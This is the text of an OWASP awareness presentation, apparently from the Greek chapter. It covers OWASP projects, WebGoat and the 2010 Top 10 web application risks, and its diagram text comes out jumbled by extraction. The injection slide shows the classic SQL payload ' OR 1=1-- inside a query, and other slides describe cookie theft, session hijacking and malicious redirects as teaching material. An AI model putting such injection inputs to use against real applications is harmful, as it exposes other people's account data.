2. Your Code is Part of Your Security Perimeter
Your security “perimeter” has huge
holes at the application layer
Custom Developed
Application Code
APPLICATION
ATTACK
App Server
Web Server
Hardened OS
You can’t use network layer protection (firewall, SSL, IDS, hardening)
to stop or detect application layer attacks
OWASP 3
3. OWASP
The Open Web Application Security Project
http://www.owasp.org
http://www.owasp.gr – http://blog.owasp.gr
4. What is OWASP?
Open Web Application Security Project
Worldwide, free and open community
Non-profit, volunteer driven organization
Mission: improve application software security
Promotes secure software development
An open forum for discussion
A free resource for any development team
Publications, Articles, Standards
Testing and Training Software
Local Chapters & Mailing Lists
OWASP 5
5. The Greek Chapter
Created in 2005 but active since early 2007
Mission: raise security awareness in Greece
Activities:
Translation of OWASP documentation
Mailing list
Blog
Participation in working groups and conferences
Awareness
~120 members
http://www.owasp.gr - http://blog.owasp.gr
OWASP 6
6. OWASP Body of Knowledge Guidance and Tools
for Measuring and
Guide to Application Managing Application
Security Testing and Security
Guide to Application
Security Code Review
Verifying Managing
Application Application
Guide to Building Security Security
Secure Web
Applications and Web
Services
Acquiring and Application
Core Application
AppSec Conferences
Building Security
Security
Secure Tools
Knowledge Base
Chapters
Projects
Applications Tools for Scanning,
Testing, Simulating,
and Reporting Web
Application Security
AppSec Issues
Research to
Secure New Education and
Research Projects to CBT
Figure Out How to Technologies Principles
Secure the Use of New Threat Agents,
OWASP Community Platform
Web Based Learning Attacks,
(wiki, forums, mailing lists) Technologies (like
Ajax) Environment and Vulnerabilities,
Guide for Learning Impacts, and
Application Security Countermeasures
OWASP Foundation 501c3
OWASP
8. What’s a WebGoat
OWASP project with ~115,000 downloads
Deliberately insecure Java EE web application
Teaches common application vulnerabilities via a
series of individual lessons
OWASP 9
12. OWASP Top 10 Risk Rating Methodology
1
2
3
Injection Example
1.66 weighted risk rating
OWASP 13
13. OWASP Top 10 2010
http://www.owasp.org/index.php/Top_10
OWASP 14
14. A1. Injection
"SELECT * FROM
Account Summary
accounts WHERE
Account:
HTTP
acct=‘’ OR 1=1--
SKU:
Acct:5424-6066-2134-4334
DB Table Acct:4128-7574-3921-0192
HTTP SQL
response ’"
Acct:5424-9383-2039-4029
APPLICATION
request
ATTACK query Acct:4128-0004-1234-0293
Custom Code
1. Application presents a form to
the attacker
2. Attacker sends an attack in the
form data
App Server
3. Application forwards attack to
Web Server
the database in a SQL query
Hardened OS
4. Database runs query containing
attack and sends encrypted results
back to application
5. Application decrypts data as
normal and sends results to the user
OWASP 15
15. A2. Cross-Site Scripting (XSS)
1 Attacker sets the trap – update my profile
Application with
stored XSS
Attacker enters a vulnerability
malicious script into a web
page that stores the data
on the server
2 Victim views page – sees attacker profile
Custom Code
Script runs inside victim’s
browser with full access to
the DOM and cookies
3 Script silently sends attacker Victim’s session cookie
OWASP 16
16. A3. Broken Authentication and Session
Management 1 User sends credentials
www.boi.com?JSESSIONID=9FA1DB9EA...
Site uses URL rewriting 2 Custom Code
(i.e., put session in URL)
3 User clicks on a link to http://www.hacker.com
in a forum
Hacker checks referer logs on www.hacker.com
and finds user’s JSESSIONID 4
5 Hacker uses JSESSIONID
and takes over victim’s
account
OWASP 17
17. A4. Insecure Direct Object References
Attacker notices his acct
https://www.onlinebank.com/user?acct=6065 parameter is 6065
?acct=6065
He modifies it to a
nearby number
?acct=6066
Attacker views the
victim’s account
information
OWASP 18
18. A5. Cross-Site Request Forgery (CSRF)
Attacker sets the trap on some website on the internet
1 (or simply via an e-mail)
Application with CSRF
Hidden <img> tag vulnerability
contains attack against
vulnerable site
While logged into vulnerable site,
2 victim views attacker site
Custom Code
3
Vulnerable site sees
<img> tag loaded by legitimate request from
browser – sends GET victim and performs the
request (including action requested
credentials) to vulnerable
site
OWASP 19
19. A6 – Security Misconfiguration
Web applications rely on a secure foundation
• Everywhere from the OS up through the App Server
• Don’t forget all the libraries you are using!!
Is your source code a secret?
• Think of all the places your source code goes
• Security should not require secret source code
CM must extend to all parts of the application
• All credentials should change in production
Typical Impact
• Install backdoor through missing OS or server patch
• XSS flaw exploits due to missing application framework patches
• Unauthorized access to default accounts, application functionality or data,
or unused but accessible functionality due to poor server configuration
OWASP
20. A7. Insecure Cryptographic Storage
Victim enters credit
1 card number in form
Malicious insider Log files
4
steals 4 million credit Error handler logs CC 2
card numbers details because merchant
gateway is unavailable
Logs are accessible to all 3
members of IT staff for
debugging purposes
OWASP 21
21. A8. Failure to Restrict URL Access
Attacker notices the URL
https://www.onlinebank.com/user/getAccounts
indicates his role
/user/getAccounts
He modifies it to another
directory (role)
/admin/getAccounts, or
/manager/getAccounts
Attacker views more
accounts than just their
own
OWASP 22
22. A9. Insufficient Transport Layer Protection
Business Partners
External Victim
Custom Code Backend Systems
Employees
1 2
External attacker Internal attacker
steals credentials steals credentials
and data off and data from
network internal network
External Attacker Internal Attacker
OWASP
23. A10. Unvalidated Redirects and Forwards
1 Attacker sends attack to victim via email or webpage
From: Internal Revenue Service
Subject: Your Unclaimed Tax Refund
Our records show you have an 3 Application redirects
unclaimed federal tax refund. Please victim to attacker’s site
click here to initiate your claim.
Victim clicks link containing unvalidated
2 parameter
Custom Code
Request sent to vulnerable
site, including attacker’s
destination site as parameter.
Redirect sends victim to
attacker site Evil Site
4 Evil site installs malware on
http://www.irs.gov/taxrefund/claim.jsp?year=2006 victim, or phish’s for private
& … &dest=www.evilsite.com information
OWASP 24
26. Goals and Purpose
To define building blocks for an assurance program
Delineate all functions within an organisation that could be
improved over time
To allow organizations to create customized roadmaps
Each organisation can choose the order and extent they improve
each function
To provide sample roadmaps for common types of
organisations
Each roadmap is a baseline that can be tweaked based on the
specific concerns of a given organisation
OWASP 27
28. Imagine an Enterprise Security API
All the security controls a developer needs
Standard
Centralized
Organized
Integrated
High Quality
Intuitive
Tested
Solves the problems of missing and broken controls
OWASP
29. Authenticator
User
AccessController
AccessReferenceMap
Validator
Encoder
HTTPUtilities
Enterprise Security API
Encryptor
EncryptedProperties
Randomizer
Enterprise Security API
Exception Handling
Custom Enterprise Web Application
Logger
IntrusionDetector
OWASP
Existing Enterprise Security Services/Libraries
SecurityConfiguration
30